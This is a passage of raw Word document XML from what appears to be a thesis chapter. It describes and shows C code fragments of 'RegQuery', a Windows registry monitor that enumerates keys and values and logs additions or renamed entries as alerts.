        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">wchLogBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(wchLogBuffer));</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0;</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((cSubKeys - 1 == i) &amp;&amp; aft &amp;&amp; (nCount == 0) &amp;&amp; (cSubKeys &gt; 0)) {</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//If the name of the subkey in the last pos</w:t>
      </w:r>
      <w:r w:rsidR="00B728B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ition is diffe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>rent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//from the previous query</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wcscmp(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastSubkeyName, achKey)) {</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getDateTime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchTime);</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L"DEBUG TIME: %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchTime);</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wchTime);</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L"[REGISTRY]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L"[ALERT]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L"Key modified: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wchLogKey);</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achKey);</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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L"%s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">wchLogBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(wchLogBuffer));</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0;</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D15150" w:rsidRDefault="00D15150" w:rsidP="00B728B7">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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00B728B7">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743CCD" w:rsidRDefault="00F05F19" w:rsidP="00D15150">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The logging procedure is quite simple. RegQuery first get the time when change happened, then concatenate that time and added information about the registry subkey which is changed and called a function for writing that information out. We will discuss the logging procedure in a later section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F19" w:rsidRDefault="00F05F19" w:rsidP="00743CCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F05F19">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Monitoring the Values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F19" w:rsidRDefault="00C60196" w:rsidP="00F05F19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Like</w:t>
      </w:r>
      <w:r w:rsidR="00F05F19">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>the procedure for monitoring subkeys, when the current number of value is larger than 0, RegQuery read every value information of that key using a Windows API called “RegEnumValue”.</w:t>
      </w:r>
      <w:r w:rsidR="00DB2D4C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DB2D4C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DB2D4C">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the process for monitoring subkeys, “RegEnumValue” also return a “retCode” which is a value indicating the return code of the calling function.</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(i=0, retCode=ERROR_SUCCESS; i&lt;cValues; i++)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cchValue = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_VALUE_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">;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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>achValue[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">0] = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>'\0'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">;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retCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegEnumValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, i,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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">achValue,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/ the return value name</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&amp;cchValue, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// value name's size</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(retCode == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2D4C" w:rsidRDefault="00581DDE" w:rsidP="00DB2D4C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/ listing value for monitor and debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRPr="00DB2D4C" w:rsidRDefault="002565A7" w:rsidP="00DB2D4C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00F05F19">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegQuery also defines an “nCount” indicating the different between the previous number of value and the current number of value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00C601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int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> nCount = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00C601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if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nValues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; cValues) &amp;&amp; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00C601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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>nCount = cValues - *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nValues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60196" w:rsidRDefault="00C60196" w:rsidP="00C60196">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581DDE" w:rsidRDefault="00581DDE" w:rsidP="00581DDE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Based on nCount, RegQuery can indicate which event has happened in the registry database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If nCount &lt; 0, there was a value added to the registry database. Its information could have been added to the last position in the current value chain. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRPr="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="00F73C0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If nCount == 0, there was a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> modified in registry database. In this </w:t>
      </w:r>
      <w:r w:rsidR="0093414E" w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>thesis,</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> only identified for change in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> name. When a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> change</w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> its name, it should be move to the last position in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> chain. Therefore, the previous </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>’s name</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the last query is now different from the current </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0093414E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">name </w:t>
      </w:r>
      <w:r w:rsidRPr="00581DDE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>in the last position of the chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00581DDE" w:rsidRDefault="00581DDE" w:rsidP="00581DDE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If nCount &gt; 0, there was a value deleted from the registry database. RegQuery do nothing in this situation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B2BE7" w:rsidRPr="009B2BE7" w:rsidRDefault="009B2BE7" w:rsidP="009B2BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>In the situation when nCount &lt;= 0, the last value in the chain is suspicious. In case nCount &lt; 0, we log the value which is in the last position of the current value chain. When nCount = 0, if the name of value in the last position in the current query is different from that name in the previous query, we log that last subkey. RegQuery does nothing on other situations.</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((cValues - 1 == i) &amp;&amp; aft &amp;&amp; (cValues &gt; *nValues)) {</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getDateTime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchTime);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wcscpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer, wchTime);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L"[ALERT]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L"[REGISTRY]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 New value added at Key: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wchLogKey);</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  --&gt;Value Name added :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achValue);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  --&gt;Value Data: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(LPWSTR)lpValueData);</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LOG_TYPE_REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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L"%s"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, wchLogBuffer);</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memset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">wchLogBuffer, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(wchLogBuffer));</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((cValues - 1 == i) &amp;&amp; aft &amp;&amp; (*nValues == cValues)) {</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L"Last Value: %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
